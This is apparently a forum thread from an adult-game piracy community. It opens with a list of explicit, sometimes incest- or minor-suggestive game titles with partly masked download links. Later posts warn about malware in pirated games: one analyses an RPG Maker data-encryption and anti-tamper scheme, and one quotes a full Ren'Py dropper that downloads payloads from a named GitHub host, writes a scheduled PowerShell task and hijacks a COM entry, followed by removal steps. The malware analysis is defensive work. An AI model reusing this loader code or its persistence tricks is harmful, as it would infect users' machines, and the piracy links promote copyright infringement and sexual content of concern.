The Renaisance pixeldrain.c--/u/D1****va
My Husband's Boss pixeldrain.c--/u/8Q****SH
Sandy Bay pixeldrain.c--/u/e8****gk
CuckTales pixeldrain.c--/u/R6****Bv
The Moans of the Wife Beyond the Wall 3 pixeldrain.c--/u/Wr****sT
Pandora's Box pixeldrain.c--/u/KS****rp
Inmoral Stories Rebecca pixeldrain.c--/u/SZ****CY
Abandoned sisters want to play pixeldrain.c--/u/uu****eu
Amber's Secret Lover pixeldrain.c--/u/iT****Yk
My Sister's Devious Plot pixeldrain.c--/u/eC****As
Off the Record pixeldrain.c--/u/p5****Hm
Maiko pixeldrain.c--/u/iL****LV
Village Slut Transformation pixeldrain.c--/u/A4****8P
Forbidden Kin pixeldrain.c--/u/aQ****WJ
Pale Carnations pixeldrain.c--/u/92****Ni
Harmony Haven pixeldrain.c--/u/vw****xo
Garage Vamp pixeldrain.c--/u/iH****5P
Trouble at Home pixeldrain.c--/u/wB****tG
My Wife is a Football Coach pixeldrain.c--/u/z2****2y
Siblings Delight pixeldrain.c--/u/6H****Tz
School Love and Friends pixeldrain.c--/u/oo****2G
Man's Best Friend pixeldrain.c--/u/6R****7V
Swipe Right for Sugar Mama Sensei pixeldrain.c--/u/rn****fB
The Queen who adopted a goblin pixeldrain.c--/u/yP****pp
Gunnerkrigg Court Trainer Summer Vacation pixeldrain.c--/u/FB****2W
Girl Scout Island pixeldrain.c--/u/ru****XG
The Visit pixeldrain.c--/u/Yt****2n
A wife's Loyalty pixeldrain.c--/u/dh****A2
Mi Unica Hija pixeldrain.c--/u/s8****Gj
Husbands of Evelyn pixeldrain.c--/u/r7****cr
Relative Twins Reverse Rape Me to Get Pregnant! If I'm Caught My Life is Over pixeldrain.c--/u/SL****mB
Alchemist Trainer pixeldrain.c--/u/T3****ua
Chaos Beach A Virgin Boy Pheromone-Fueled Summer of Lust pixeldrain.c--/u/ea****2q
FemBoy Called it Massage pixeldrain.c--/u/Hq****wG
Now and Then pixeldrain.c--/u/Jf****83
Boxed In pixeldrain.c--/u/H1****1w
Heart Problems pixeldrain.c--/u/rH****Hf
Found in Translation pixeldrain.c--/u/bQ****V2
One Summer in LolliWood pixeldrain.c--/u/zA****pm
Iris Chronicle pixeldrain.c--/u/zC****ut
Jessica's Life pixeldrain.c--/u/R2****o7
Love n Life: Happy Student pixeldrain.c--/u/eE****fn
Eve's Story pixeldrain.c--/u/5J****bN
Fictional Story pixeldrain.c--/u/XU****Vx
My LDR Girlfriend became the Plaything for all the Deprived Male Goons pixeldrain.c--/u/73****x8
Wet Summer Days pixeldrain.c--/u/Tp****FQ
Pleasure Echo Erase pixeldrain.c--/u/5L****T7
Neet Angel and N Family pixeldrain.c--/u/7G****tj
Netori Knights pixeldrain.c--/u/y1****UY
DeadLand Fallen Apartment pixeldrain.c--/u/ZL****o5
Tomboy Supremacy pixeldrain.c--/u/Uh****Mt
Nemurimouto pixeldrain.c--/u/EF****v6
Cheerleaders pixeldrain.c--/u/Sj****fQ
Chona (Extras Unlocked) pixeldrain.c--/u/FR****5Y
Man of the House pixeldrain.c--/u/wU****Lc
23 Sisters pixeldrain.c--/u/JM****Yv
My New Girlfriend pixeldrain.c--/u/wR****ur
Lewd Town Adventures pixeldrain.c--/u/oG****j4
The Lust Voyage pixeldrain.c--/u/kU****bZ
The Intern pixeldrain.c--/u/97****up
Under the Same Roof pixeldrain.c--/u/y4****w8
Porn Battle 2 pixeldrain.c--/u/fQ****VL
Long Live The Princess pixeldrain.c--/u/Fr****cT
Satisfy him pixeldrain.c--/u/fw****36
Milf Obsession pixeldrain.c--/u/Na****hr
Part-time Wife's Affair - Ripe Femininity and Passionate Moans pixeldrain.c--/u/y9****Hi
Office Rivals pixeldrain.c--/u/3H****SX
Opportunity: A Sugar Baby Story pixeldrain.c--/u/iM****mo
Love and Submission pixeldrain.c--/u/A1****Xv
My Classmate is AV Actress pixeldrain.c--/u/4C****Kn
Shrink pixeldrain.c--/u/nf****uF
Lydia's New Life pixeldrain.c--/u/fb****MJ
Escape From Ivy And Piper pixeldrain.c--/u/za****X3
Lust Sisters pixeldrain.c--/u/i9****Km
Big Titties Solitaire pixeldrain.c--/u/Zq****DY
NTR Kazoku pixeldrain.c--/u/Hn****KH
Cursed Affection pixeldrain.c--/u/jM****gk
High School Days pixeldrain.c--/u/a6****ok
Gals Collector pixeldrain.c--/u/GL****Kf
In Her Service pixeldrain.c--/u/8o****d9
Futamata pixeldrain.c--/u/dZ****23
Photo Hunt pixeldrain.c--/u/pn****gH
Love and Jealousy pixeldrain.c--/u/13****te
Guilty Pleasure pixeldrain.c--/u/5k****sU
Moving in pixeldrain.c--/u/6s****Pq
The Assistant pixeldrain.c--/u/HH*****Wc
The Guardian pixeldrain.c--/u/Np****gL
Ravenous Arc 2 pixeldrain.c--/u/Sf****5N
Cabin by the Lake pixeldrain.c--/u/js****31
Shop Mistress NTR pixeldrain.c--/u/1W****EK
Misanthropy pixeldrain.c--/u/Gy****iw
A Couple's Duet of Love & Lust pixeldrain.c--/u/Gy****iw
Blacked House pixeldrain.c--/u/Ai****GB
Family, Friends and Strangers pixeldrain.c--/u/mA****tB
 
  • Like
Reactions: oaklash and Scale
The common point of failure for all of these malware are remote payload, this is how they stay undetected. I think the definitive fix for people would be DNS vector - if a bad domain is detected, then the swarm mitigate itself.

Though it's still tricky to catch all Dynamic DNS (which is similar to disposable email - we must ban the entire service or it will be whac-a-mole)
 
regarding "RJ01588706" that was posted here (only checked this one), i think the original source of that is from https://www.tokyotosho.info/search.php?username=Reeffress because all new game that this user posted has heavily obfuscated the json files and other files. no idea if it just obfuscated the file and not doing anything so just be wary on downloading them. claude analysis for it:

How the Obfuscation Works
Tool Identified: MZDataCrypt v1.6.0
This is a known RPG Maker MZ data encryptor. The bid field ("bid":"1.6.0") is literally the tool version. The protection has two layers: data encryption and anti-tamper, both injected directly into rmmz_managers.js.

Layer 1 — Data Encryption
Injection point: DataManager.onXhrLoad in rmmz_managers.js is completely replaced (minified to a single ~7KB line).

Format: Every data/*.json becomes:
{ "uid": "<8 hex chars>", "bid": "1.6.0", "data": "<base64>" }

Key derivation algorithm:
MASTER_KEY = 0xAB (171, hardcoded as window._K)

per_file_key(filename):
t = sum of ASCII char codes of filename (no extension)
return MASTER_KEY XOR (t & 0xFF)

decrypt(base64_data, filename):
bytes = base64_decode(base64_data)
key = per_file_key(filename)
for i: bytes ^= key // single-byte XOR, same key whole file
return utf8_decode(strip_BOM(bytes))

It's a uniform single-byte XOR — the same byte applied to every position. No rolling key, no IV, no real crypto. The uid field looks meaningful but is actually unused in decryption — just a file identifier.

Weakness: Because it's single-byte XOR, the key can be brute-forced in at most 256 tries just by checking if the output is valid UTF-8 JSON — which is exactly what I did. Or you can compute it directly once you know MASTER_KEY = 0xAB.

Precomputed keys (all verified against actual files):

File Key
System 0x2E
Actors 0xC7
MapInfos 0xB6
Skills 0xD9
Map001/010 0x04
Map002/011/020 0x1B
Map003/012/021/030 0x1A
… (sequential by digit sum) …
Note that maps with the same digit sum share a key (e.g. Map001 and Map010 both key to 0x04), which is another weakness.

Layer 2 — Anti-Tamper (NW.js only)
Runs once on first XHR load via if (typeof window._K === 'undefined'). Uses Node.js fs/path modules directly — only works in NW.js (the runtime RPG Maker MZ ships with), not in a browser.

String obfuscation inside the injected code: There's a sub-cipher for its own internal strings:
f341986 = (s) => {
b = Buffer.from(s, 'base64')
for i: b ^= 0x77
return b.toString()
}

Base64 decode → XOR with 0x77. Decoded strings:
'Gx4VMDsyJAFFWRMbGw==' → libGLESv2.dll
'Gx4VMjA7WRMbGw==' → libEGL.dll
'ExIVAhAVAhAOEgQDHhkQWQMSBAM=' → debugbugyesting.test

File integrity checks (v6f3bb0): Reads raw bytes from libGLESv2.dll and libEGL.dll (NW.js runtime DLLs shipped with the game) and checks:
Exact file size
32 bytes at a specific offset match a hardcoded hex string
Last 16 bytes of the file are all zeros
If either check fails → window.close(); process.exit() immediately kills the game. This prevents replacing the NW.js runtime with a patched version.

DevTools blocking: F12/F8 open DevTools only if a folder named debugbugyesting.test exists in the game directory. Otherwise nothing happens. F10 triggers a full self-scan of all data/*.json files to verify they decrypt correctly.

Summary
Aspect Detail
Tool MZDataCrypt 1.6.0
Data cipher Single-byte XOR (trivially reversible)
Key source 0xAB XOR (sum_of_filename_chars & 0xFF)
Master key Hardcoded 0xAB in window._K
Anti-tamper NW.js DLL byte-pattern check (libGLESv2.dll, libEGL.dll)
DevTools gate Requires debugbugyesting.test/ folder to exist
String obfuscation Base64 + XOR 0x77 for internal filenames
Injection point DataManager.onXhrLoad in rmmz_managers.js
 
  • Like
Reactions: MrGuiW
new game that was posted here, same info as above RJ01596306 but newer version?

MZDataCrypt — v1.6.0 vs v1.10.0 Reverse Engineering Notes

Two RPG Maker MZ doujin games analyzed, both protected by MZDataCrypt. Same tool, significant encryption upgrade between versions.



Overview

Aspectv1.6.0v1.10.0
bid field1.6.01.10.0
Master key _K171 (0xAB)211 (0xD3)
Filename hashSum of char codesdjb2 rolling hash
Per-byte cipherFlat single-byte XORRolling stream cipher w/ feedback
String cipherbase64 + XOR 0x77base64 + XOR 0x61 (bitwise disguise)
Dev folderdebugbugyesting.testoK5dpQ1prR2ml6xG8ceI0ksH4ndW3i.test
Anti-debuggerNonesetInterval(debugger) every 50ms
DLL integritylibGLESv2 + libEGLSame (identical expected hashes)



Data Format

Every data/*.json is replaced with:

Code:
{
  "uid": "<8 hex chars>",   // per-file identifier, NOT used in decryption
  "bid": "1.x.x",           // tool version
  "data": "<base64>"        // encrypted payload
}



v1.6.0 — Key Derivation

Simple and weak. Single-byte XOR, same key applied to every byte in the file.

Code:
MASTER_KEY = 0xAB  // 171, hardcoded as window._K

function getFileKey(filename):   // no extension
    t = sum of charCode(c) for each c in filename
    return MASTER_KEY XOR (t & 0xFF)

function decrypt(base64_data, filename):
    bytes = base64_decode(base64_data)
    key   = getFileKey(filename)
    for i in range(len(bytes)):
        bytes[i] ^= key          // uniform XOR, trivially reversible
    return utf8_decode(strip_BOM(bytes))

Weakness: Single-byte XOR can be brute-forced in at most 256 tries by checking if output is valid UTF-8 JSON. Filenames with the same char-code sum share keys (e.g. Map001 and Map010 both → 0x04).

Precomputed keys (v1.6.0):
Code:
System      → 0x2E    Actors    → 0xC7    MapInfos  → 0xB6
Skills      → 0xD9    States    → 0xDF    Troops    → 0x2C
Weapons     → 0x76    Tilesets  → 0xE6    Items     → 0xA9
Enemies     → 0x6D    Armors    → 0xDF    Classes   → 0x65
Map001/010  → 0x04    Map002/011/020 → 0x1B
Map003/012/021/030 → 0x1A    (sequential by digit sum)



v1.10.0 — Key Derivation

Significant upgrade. Uses djb2 hash and a rolling stream cipher with ciphertext feedback.

Step 1 — Filename hash (djb2):
Code:
t = 0
for each char c in filename (no extension):
    t = (t << 5) - t + charCode(c)   // djb2: t * 31 + c
    t &= 0xFFFFFFFF                   // keep 32-bit

djb2 distributes hashes much better — Map001/Map010 no longer collide.

Step 2 — Base file key:
Code:
fk = _K XOR (t & 0xFF)    // _K = 211 (0xD3)

(In JS, XOR is written as (a | b) & ~(a & b) to obscure intent)

Step 3 — Rolling stream cipher:
Code:
l = fk   // initial state

for each byte i:
    rotated = ((l << 4) XOR (l >> 2)) & 0xFF
    k = ((fk XOR 60) + (i % 256) + rotated) XOR 122 + 19  (mod 256)
    decrypted = raw[i] XOR k
    raw[i] = decrypted
    l = decrypted    // ← feedback: next key depends on previous OUTPUT

Key difference from v1.6.0: This is a stream cipher with ciphertext feedback. Each byte's key depends on all previously decrypted bytes. You cannot brute-force file-by-file without knowing _K, because a wrong key cascades into garbage immediately.



Injection Point

Both versions patch DataManager.onXhrLoad inside js/rmmz_managers.js, minified to a single line (~7–9KB). The entire function is replaced.



Anti-Tamper — Both Versions

Runs once on first XHR load via if (typeof window._K === 'undefined'). NW.js only (uses Node.js require('fs') / require('path')).

DLL integrity check: Reads raw bytes from the NW.js runtime DLLs and verifies:
  • Exact file size
  • 32 bytes at a specific offset match a hardcoded hex string
  • Last 16 bytes of the file are all zeros

Code:
// Targets (both versions, identical expected hashes):
libGLESv2.dll  size=8192528  offset=10000  hash=D34889CF488B054DE375...
libEGL.dll     size=386576   offset=5000   hash=2558000000488B0CCA3B...

If either check fails → window.close(); process.exit() immediately.

DevTools blocking: F12/F8 only open DevTools if the dev folder exists. The folder name changed between versions — v1.6.0 used a readable name, v1.10.0 uses randomized gibberish.

String obfuscation for internal filenames:
Code:
// v1.6.0:  base64_decode(s), then XOR each byte with 0x77
// v1.10.0: base64_decode(s), then XOR each byte with 0x61
//          (written as (b[i] | 97) & ~(b[i] & 97) to hide the XOR)



v1.10.0 Only — Active Anti-Debug

New in v1.10.0. If the dev folder is absent, fires a debugger trap every 50ms:

Code:
setInterval(function() {
    (function(){}).constructor('debugger')();
}, 50);

Uses Function.constructor instead of the literal debugger keyword to evade simple string searches. Makes DevTools nearly unusable without disabling this interval first.



as for RJ01569430, bought the original and compare, the difference was on "renpy" folder.
 
Last edited:
  • Like
Reactions: MrGuiW
new game that was posted here, same info as above RJ01596306 but newer version?

MZDataCrypt — v1.6.0 vs v1.10.0 Reverse Engineering Notes

Two RPG Maker MZ doujin games analyzed, both protected by MZDataCrypt. Same tool, significant encryption upgrade between versions.



Overview

Aspectv1.6.0v1.10.0
bid field1.6.01.10.0
Master key _K171 (0xAB)211 (0xD3)
Filename hashSum of char codesdjb2 rolling hash
Per-byte cipherFlat single-byte XORRolling stream cipher w/ feedback
String cipherbase64 + XOR 0x77base64 + XOR 0x61 (bitwise disguise)
Dev folderdebugbugyesting.testoK5dpQ1prR2ml6xG8ceI0ksH4ndW3i.test
Anti-debuggerNonesetInterval(debugger) every 50ms
DLL integritylibGLESv2 + libEGLSame (identical expected hashes)



Data Format

Every data/*.json is replaced with:

Code:
{
  "uid": "<8 hex chars>",   // per-file identifier, NOT used in decryption
  "bid": "1.x.x",           // tool version
  "data": "<base64>"        // encrypted payload
}



v1.6.0 — Key Derivation

Simple and weak. Single-byte XOR, same key applied to every byte in the file.

Code:
MASTER_KEY = 0xAB  // 171, hardcoded as window._K

function getFileKey(filename):   // no extension
    t = sum of charCode(c) for each c in filename
    return MASTER_KEY XOR (t & 0xFF)

function decrypt(base64_data, filename):
    bytes = base64_decode(base64_data)
    key   = getFileKey(filename)
    for i in range(len(bytes)):
        bytes[i] ^= key          // uniform XOR, trivially reversible
    return utf8_decode(strip_BOM(bytes))

Weakness: Single-byte XOR can be brute-forced in at most 256 tries by checking if output is valid UTF-8 JSON. Filenames with the same char-code sum share keys (e.g. Map001 and Map010 both → 0x04).

Precomputed keys (v1.6.0):
Code:
System      → 0x2E    Actors    → 0xC7    MapInfos  → 0xB6
Skills      → 0xD9    States    → 0xDF    Troops    → 0x2C
Weapons     → 0x76    Tilesets  → 0xE6    Items     → 0xA9
Enemies     → 0x6D    Armors    → 0xDF    Classes   → 0x65
Map001/010  → 0x04    Map002/011/020 → 0x1B
Map003/012/021/030 → 0x1A    (sequential by digit sum)



v1.10.0 — Key Derivation

Significant upgrade. Uses djb2 hash and a rolling stream cipher with ciphertext feedback.

Step 1 — Filename hash (djb2):
Code:
t = 0
for each char c in filename (no extension):
    t = (t << 5) - t + charCode(c)   // djb2: t * 31 + c
    t &= 0xFFFFFFFF                   // keep 32-bit

djb2 distributes hashes much better — Map001/Map010 no longer collide.

Step 2 — Base file key:
Code:
fk = _K XOR (t & 0xFF)    // _K = 211 (0xD3)

(In JS, XOR is written as (a | b) & ~(a & b) to obscure intent)

Step 3 — Rolling stream cipher:
Code:
l = fk   // initial state

for each byte i:
    rotated = ((l << 4) XOR (l >> 2)) & 0xFF
    k = ((fk XOR 60) + (i % 256) + rotated) XOR 122 + 19  (mod 256)
    decrypted = raw[i] XOR k
    raw[i] = decrypted
    l = decrypted    // ← feedback: next key depends on previous OUTPUT

Key difference from v1.6.0: This is a stream cipher with ciphertext feedback. Each byte's key depends on all previously decrypted bytes. You cannot brute-force file-by-file without knowing _K, because a wrong key cascades into garbage immediately.



Injection Point

Both versions patch DataManager.onXhrLoad inside js/rmmz_managers.js, minified to a single line (~7–9KB). The entire function is replaced.



Anti-Tamper — Both Versions

Runs once on first XHR load via if (typeof window._K === 'undefined'). NW.js only (uses Node.js require('fs') / require('path')).

DLL integrity check: Reads raw bytes from the NW.js runtime DLLs and verifies:
  • Exact file size
  • 32 bytes at a specific offset match a hardcoded hex string
  • Last 16 bytes of the file are all zeros

Code:
// Targets (both versions, identical expected hashes):
libGLESv2.dll  size=8192528  offset=10000  hash=D34889CF488B054DE375...
libEGL.dll     size=386576   offset=5000   hash=2558000000488B0CCA3B...

If either check fails → window.close(); process.exit() immediately.

DevTools blocking: F12/F8 only open DevTools if the dev folder exists. The folder name changed between versions — v1.6.0 used a readable name, v1.10.0 uses randomized gibberish.

String obfuscation for internal filenames:
Code:
// v1.6.0:  base64_decode(s), then XOR each byte with 0x77
// v1.10.0: base64_decode(s), then XOR each byte with 0x61
//          (written as (b[i] | 97) & ~(b[i] & 97) to hide the XOR)



v1.10.0 Only — Active Anti-Debug

New in v1.10.0. If the dev folder is absent, fires a debugger trap every 50ms:

Code:
setInterval(function() {
    (function(){}).constructor('debugger')();
}, 50);

Uses Function.constructor instead of the literal debugger keyword to evade simple string searches. Makes DevTools nearly unusable without disabling this interval first.



as for RJ01569430, bought the original and compare, the difference was on "renpy" folder.
So, is this a strange DRM or is there a hidden malware in it?
 
Also, these software pages were hacked yesterday, containing a RAT malware (April 9-10)

1775830986828.png

Gamers use CPU-Z pretty much, so be careful, hacked versions were:
CPU-Z 2.19
HWMonitor 1.63
 
So, is this a strange DRM or is there a hidden malware in it?

not sure if there is a hidden malware on it or not, the one i check RJ01588706
libEGL.dll & libGLESv2.dll has only extra zero bytes at the end of it.
rmmz_managers.js contain the decryption to the json files. and that's it i think.

and another new game that was posted here RJ01464379 same style obfuscation probably some different on some parts because it was RPG Maker MV instead of MZ.
 
Last edited:
New info, the same malware comes from a spanish guy that was infecting RenPy games/mod galleries on f95, i will quote 'colobancuz' analysis on the previous version of the malware:

Infected files:
1776908614103.png


Previous RenPy malware analysis (F95):
So, let's analyse the latest attack (thanks to Bob69 for the sample):
Python:
init python:

    import base64, os, tempfile, subprocess
    appDataLocal = os.environ.get("LOCALAPPDATA")


    txxt4b = os.path.join(appDataLocal, "settings.bak")

    startupinfo = subprocess.STARTUPINFO()
    startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
    subprocess.Popen([
                "curl",
                "-L",
                "https://raw.githubusercontent.com/DnyP/files/main/env2.dat",
                "-o", txxt4b
         ],startupinfo=startupinfo)

    txxt4 = os.path.join(appDataLocal, "settings.dat")

    startupinfo = subprocess.STARTUPINFO()
    startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
    subprocess.Popen([
                "curl",
                "-L",
                "https://raw.githubusercontent.com/DnyP/files/main/zaesdl.dat",
                "-o", txxt4
         ],startupinfo=startupinfo)

    import time
    time.sleep(3)


    import datetime

    arg1 = "cmd.exe /c powershell -EncodedCommand %MI_V%"

    fecha = datetime.datetime.now() + datetime.timedelta(days=3)
    fechaStr = fecha.strftime("%d/%m/%Y")
    horaStr = fecha.strftime("%H:%M")

    arg1 = "cmd.exe /c powershell -EncodedCommand %MI_V%"

    startupinfo = subprocess.STARTUPINFO()
    startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
    subprocess.Popen([
          "schtasks",
            "/create",
            "/f",
            "/sc", "once",
            "/st", horaStr,
            "/sd", fechaStr,
            "/tn", "update-systask",
            "/tr", arg1
         ],startupinfo=startupinfo)


    if os.path.exists(txxt4b):
        with open(txxt4b, "r") as f:
            envvar = f.read()
          
            startupinfo = subprocess.STARTUPINFO()
            startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
            subprocess.Popen([
                     "reg",
                     "add",
                     "HKCU\Environment",
                     "/v", "MI_V",
                     "/t",
                     "REG_SZ",
                     "/d", envvar,
                     "/f"
                 ],startupinfo=startupinfo)
The Renpy part downloads two files, settings.bak (env2.dat) and settings.dat (zaesdl.dat), from the repository https://github.com/DnyP/files to the AppData\Local\ folder. The contents of settings.bak are written to the "MI_V" environment variable. This is a base64-encoded PowerShell script. Then, an "update-systask" scheduler task is created with a start time 3 days from the current date. The task runs the PowerShell script located in "MI_V".
Code:
$basePath = $env:LOCALAPPDATA

$folders = Get-ChildItem -Path $basePath -Directory | Where-Object {
    $_.Name -ne "History" -and
    $_.Name -notmatch "\s"
}


$o = Get-Random -InputObject $folders

$o = $o.FullName + "\"

$letters = 'abcdefghijklmnopqrstuvwxyz'
$word = -join (1..6 | ForEach-Object { $letters[(Get-Random -Minimum 0 -Maximum $letters.Length)] })

$o = $o + $word + ".dll"

$i=Join-Path -Path $basePath -ChildPath "settings.dat"
$j=Join-Path -Path $basePath -ChildPath "settings.bak"

$c = "{B210D694-C8DF-490D-9576-9E20CDBC20BD}"

$p2 = "HKCU:\SOFTWARE\Classes\CLSID\$c\InprocServer32"
New-Item -Path $p2 -ItemType Directory -Force -ErrorAction SilentlyContinue | Out-Null

Set-ItemProperty -Path "HKCU:\SOFTWARE\Classes\CLSID\$c\InprocServer32" -Name "(Default)" -Value $o -Type String

Remove-ItemProperty -Path "HKCU:\Environment" -Name "MI_V" -ErrorAction SilentlyContinue | Out-Null

Unregister-ScheduledTask -TaskName "update-systask" -Confirm:$false -ErrorAction SilentlyContinue | Out-Null


$a=[System.Security.Cryptography.Aes]::Create()
$a.Key=[Text.Encoding]::UTF8.GetBytes("zbcd1j9234r670eh")
$a.IV=$a.Key
$a.Mode=[System.Security.Cryptography.CipherMode]::CBC
$d=$a.CreateDecryptor()
$e=[IO.File]::ReadAllBytes($i)
$ds=$d.TransformFinalBlock($e,0,$e.Length)
[IO.File]::WriteAllBytes($o,$ds)
Remove-Item -Path $i
Remove-Item -Path $j
PowerShell script decrypts settings.dat into a DLL file (virustotal) with a random name and randomly selected folder in AppData\Local\, registers the COM‑in‑proc server (GUID:B210D694-C8DF-490D-9576-9E20CDBC20BD) and cleans up traces of its presence (deletes the settings.bak and settings.dat files and the "MI_V" environment variable).
The attack is similar to those used in infected GalleryUnlockers.

For those who download and run the infected version of the game (4-5 people), it is recommended to check for the presence of the settings.bak and settings.dat files in the AppData\Local\ folder and delete them. You should also delete the environment variable "MI_V"' and the update-systas scheduler task. You have three days (if you launched it yesterday, you have two days). Scanning with antivirus will not help - malware encrypted.
You can delete the task and environment variable using PowerShell:
Code:
Unregister-ScheduledTask -TaskName "update-systask" -Confirm:$false

Remove-ItemProperty -Path "HKCU:\Environment" -Name "MI_V"

This file (zaesdl) also contains the same C2 url from the RPGM version, so its the same RAT:

1776908520650.png
 

Attachments

  • 1776908606394.png
    1776908606394.png
    26.2 KB · Views: 38
  • Like
Reactions: ninnikuryona